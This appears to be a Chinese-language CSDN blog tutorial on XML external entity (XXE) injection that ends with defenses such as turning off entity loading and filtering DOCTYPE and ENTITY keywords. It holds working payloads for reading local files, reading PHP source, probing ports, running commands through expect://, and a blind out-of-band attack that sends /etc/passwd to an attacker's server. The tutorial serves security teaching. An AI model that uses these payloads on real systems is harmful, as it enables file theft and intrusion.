XML 实体注入

最新推荐文章于 2024-05-27 12:15:00 发布
最新推荐文章于 2024-05-27 12:15:00 发布
阅读量6.6k 收藏 15
点赞数 6
分类专栏: Web 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43915762/article/details/88984317
版权
XML 的文档结构:
  • XML 文档声明,在文档的第一行
  • XML 文档类型定义,即DTD,XXE 漏洞所在的地方
  • XML 文档元素
    在这里插入图片描述
DTD

内部声明 DTD:
<!DOCTYPE 根元素 [元素声明]>

引用外部 DTD:
<!DOCTYPE 根元素 SYSTEM "文件名">

<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

实体声明

内部声明实体:
<!ENTITY 实体名称 "实体的值">

引用外部实体:
<!ENTITY 实体名称 SYSTEM "URI/URL/协议">

<!ENTITY 实体名称 PUBLIC "public_ID" "URI">

XML 外部引用支持的协议

在这里插入图片描述
对于 PHP:

  • file:可用 file://文件地址,来读取文件
  • http:可以访问 HTTP(S) 网址
  • FTP:访问 FTP
  • PHP:访问各个 输入/输出 流
  • zlib:压缩流
  • data:数据
  • glob:查找匹配的文件格式路径
  • expect:处理交互式的流,可用来执行命令,但需要先安装相应插件
判断是否存在 XML 实体注入

输入框URL的参数中输入一些 XML 标签,如:<username> Have XXE</username>,若页面回显出Have XXE,那么说明这个标签被后台所调用,说明存在 XML 实体注入。

但是有的时候,这些注入点可能不是那么明显,如一些仅适用 JSON 去访问服务的客户端。我们可以通过修改 HTTP 请求,修改 Content-Type 头部字段等方法,然后去查看响应包,查看程序是否解析了发送的内容,如果解析了,则存在 XXE 攻击漏洞。

现实中存在的大多数 XXE 漏洞都是 Blind XXE,即不可见的,必须采用带外通道才能查看返回信息的记录。

XXE 的危害

① 读取任意文件
② 执行系统命令,但需要有 expect 插件
③ 扫描网站的端口以及是否存在某些目录或文件
④ 通过 http 协议发起 SSRF 攻击

XML 实体注入攻击实例

① 读取 txt 格式的文件(file 协议)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
	<!ENTITY test SYSTEM "file:///var/www/html/test.txt">
]>
<c>&test;</c>
  • 第 1 行是一个 XML 文档声明,告诉解析器这是一个 XML 文件。
  • 第 2 - 4 行是 DTD,调用了一个外部实体,将本机 test.txt 文件的内容赋值给实体 test。此处造成了 XML 实体注入攻击。
  • 最后一行是输出实体的值
② 读取 PHP 格式的文件(使用 PHP 协议)

因为 PHP 中有 <?php ?>,当 XML 解析时,遇到 <? 这类的符号时,会将 PHP 当做 XML 去解析,所以会报错,故需要将其进行 base64 编码读出。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
	<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
]>
<c>&test</c>

通过 PHP 协议的 filter 输出流读取 PHP,并经过 base64 编码,这样 XML 就不会去解析 PHP 中的 <? ,就不会报错,故可以成功读出 PHP 文件的源码内容。

③ 探测端口是否开启(HTTP 协议)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
	<!ENTITY test SYSTEM "http://127.0.0.1:3306">
]>
<c>&test</c>

根据页面返回的报错信息或内容来判断端口是否开启,可以通过 BurpSuite 抓包来查看。

通过此方法也可以来查看目录或者文件是否存在。

④ 执行命令(expect 协议)

若想执行协议,则需要目标主机上安装了 expect 插件,并且做了相关配置。条件较苛刻,所以比较少见。
同时还有一点需要注意:所执行的命令不允许含有空格

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
	<!ENTITY test SYSTEM "expect://ls">
]>
<c>&test</c>
⑤ Blind XXE

若服务器没有回显,那么只能使用 Blind XXE 来构建一条带外数据 (OOB) 通道来读取数据。

角色:

  • 攻击者:发起攻击
  • 攻击者的服务器:用来获取 被攻击者 服务器上的信息
  • 被攻击者:Web 服务器

思路:

  1. 攻击者发送 XML 给 Web 服务器,该 XML 文件中引用了一个外部实体,详细代码见下。
  2. Web 服务器解析 攻击者 发送的 XML,根据 XML 向 攻击者的服务器 请求获取恶意 DTD
  3. Web 服务器获取到 恶意 DTD 后,根据其内容,带着含有 Web 服务器上的信息去访问 攻击者服务器上的 HTTP 或 FTP
  4. 攻击者可以通过 请求日志 来查看请求的参数来获取信息。
详细代码:

① 攻击者 发送给 被攻击者 Web 服务器的 XML

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root[
	<!ENTITY % remote SYSTEM http://攻击者的服务器IP/test.xml>
	%remote;
]>

Web 服务器收到这段 XML 代码后就会去解析。根据其外部实体中的 http 协议去攻击者的服务器上去请求 test.xml 文件
有的时候 Web 端可能会解码,所以需要视情况将 XML 代码进行编码后再发送。

② Web 服务器 到 攻击者的服务器 上请求的 test.xml 文件代码

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://攻击者服务器 IP/%payload;'>">
%int;
%trick;

当 Web 服务器请求到 test.xml 文件,并到 Web 服务器上进行解析时,会先通过 file 协议读取到 Web 服务器 (本机) 的 /etc/passwd 文件的内容,并赋给参数实体 %payload

然后再使用 http 协议,携带者刚刚请求得到的 %payload 的内容作为参数,去访问 攻击者的服务器

这样在攻击者的服务器的日志中就会留下相应的请求信息,攻击者就可以通过浏览日志来获取相应的敏感信息。

注:带有 % 的实体是一个参数实体,只有参数实体才能在 DTD 使用,且只能在外部 DTD 中使用。

防御 XML 实体注入

1. 禁用外部实体

不同的语言有不同的禁用方式:
① PHP:
libxml_disable_entity_loader(true);

② JAVA:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

③ Python:

from lxml import etree:
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities = FALSE))
2. 过滤用户提交的 XML 数据

可以过滤一些关键字,如:<!DOCTYPE>、<!ENTITY>、SYSTEM、PUBLIC 等。

3. 不允许 XML 含有自己定义的 DTD
YT--98
关注
  • 6
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
logback.xml if 条件判断
小龙舟的工具书
11-05 7795
本地开发需要打印控制台日志,而测试以及生产环境则不需要,此时可在logback.xml中通过配置文件值进行条件判断。 1.先上代码 logback.xml <?xml version="1.0" encoding="UTF-8"?> <configuration scan="true" scanPeriod="30 seconds"> <springProperty scope="context" name="env" source="deploy.env"/> .
「 典型安全漏洞系列 」05.XML外部实体注入XXE详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-22 1498
标记:指计算机能理解的信息符号(标签),通过这些标签,计算机之间可以处理包含各种信息的HTML、文章等;可扩展性:使用者可以根据需要自行定义标签。下面是一个包含XML声明、文档类型定义(Document Type Definition,DTD)的XML文件样例。
Mybatis mapper.xml 判断条件写法注意
yonghutwo的专栏
07-12 3332
即最外边用双引号,里边用单引号,此写法会抱java.lang.NumberFormatException异常。如果要用这个写法要
【burpsuite安全练兵场-服务端10】XML外部实体注入(XXE注入)-9个实验(全)
最新发布
m0_61869253的博客
05-27 280
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
XML中DTD,Schema约束
linyaodonga的博客
07-08 239
什么是DTD约束: DTD(Document Type Definition)文档类型定义,用来约束xml文档, 规定xml文档中元素的名称,子元素的名称及顺序,元素的属性等。 什么是良好的XML 有且只有一个根元素 XML标签大小写正确区分 正确使用结束标签 正确嵌套标签 使用了合法的标签名 定义有效的属性 如下: <?xml version="1.0" encoding="...
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
youngerll的博客
01-02 926
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
XML中使用DTD
WilliamChancwl的博客
12-22 2047
使用DTD知识总结DTD介绍DTD的基本语法引入DTD的方式DTD中的元素DTD定义格式缺点 DTD介绍 DTD( Document Type Definition)文档类型定义。在XML标准中,描述了如何创建DTD,以及如何将它与根据它的规则所编写的XML文档相关联,并且还定义了XML处理器应该如何对DTD进行处理,有了DTD就可以检测XML文档的结构是否正确。 DTD在实际应用中的作用主要包...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
spring框架配置实体类复杂属性注入xml文件过程详解
08-25
Spring 框架配置实体类复杂属性注入 XML 文件过程详解 Spring 框架是 Java Web 项目中至关重要的一个框架,大多 Web 项目在工作层次上分为持久层、服务层、控制层。持久层(DAO、Mapper)用于连接数据库,完成项目...
ADO.NET实体数据模型的XML注释注入工具
04-17
在使用ADO.NET实体数据模型开发数据库应用的时候,在生成实体对象的时候,微软没有将数据库中定义的表和字段的说明文字作为XML的注释导入,通常在类和属性的XML注释中写入/// 没有元数据文档可用在进行较大项目开发...
XML做后台判断可通用
08-06
xml做后台判断 可以通用,每个页面对应有一个xml,只有一个通用类调取任意xml文件kejinxing后台判断
generator-连接数据库生成实体类和mybatis的xml文件
10-10
生成的实体类、Mapper接口和XML文件需要被正确地配置到MyBatis的配置文件中,确保Spring或其他依赖注入框架能够找到并加载它们。一旦配置完成,我们就可以在业务逻辑中直接使用这些自动生成的组件来执行数据库操作...
XML学习笔记 第二记
琴弦第七
06-18 1094
2012-08-07 1、XML实体可分为普通内部外部实体和内部外部参数实体。普通内部外部实体用在XML文档中,而内部外部参数实体用在DTD声明中。 2、DTD声明普通内部实体语法:,调用时用格式“&实体名;”。 3、DTD声明普通外部实体语法:,表示使用URI或者URL指向文件的全部内容替换实体名,比较少用,调用时用格式“&实体名;”。 4、DTD声明内部参数实体语法:,
关于xml学习(二)——xml的约束之DTD
IT一刻钟
12-30 530
什么是XML约束? 在XML技术里,可以编写一个文档来约束一个XML文档的书写规范,这称之为XML约束。 常用的约束技术:XML DTD,XML Schema
xml里对集合数据的条件判断千万别这样写
绅士jiejie的博客
01-14 2115
原来的写法: select name from user_info where 1=1 < if test="qo.ids.size>0 and qo.ids!=null"> and PK_GUID in <foreach collection="qo.ids" index="index" item="item" open=...
909422229__XML属性学习
要有梦想,即使遥远
09-06 314
DTD 的语法细节:元素定义1: 在DTD文档中使用ELEMENT声明一个XML元素,语法:     元素类型可以是元素内容、或类型 如为元素内容:则需要使用()括起来,如 如为元素类型,则直接书写,DTD规范定义的类型: EMPTY:用于定义空元素,例如 ANY:表示元素内容为任意类型。 DTD 的语法细节:元素定义2: 元素内容中可以使用如下方式,描述内容的组成
深入浅出带你了解XML实体注入
Candour_0的博客
02-19 257
深入浅出带你了解XML实体注入
XML实体注入
weixin_55190422的博客
09-25 467
XML实体注入 首先介绍下基础知识把 XML大体格式如下: 接下来我以一个题目讲解 首先题目已经告诉我们了这是一道关于XML的题目 那么怎么做呢 我们打开靶机发现是一个登录界面 我们审查网页源代码 发现里面还有个dologin.php类似于PHP源码。所以我们考虑BP抓包发现是个XXE漏洞Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest 我们用这个格式payl
"XXE漏洞分析与防御:深度剖析XML实体注入漏洞及防范措施
构建外部实体注入是XXE攻击的关键步骤,可以通过DTD外部实体声明进行攻击,通过引入外部DTD文档再引入外部实体声明进行攻击,或者通过引入外部DTD文档再引入参数实体进行攻击。XXE漏洞的利用方式包括本地任意文件...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值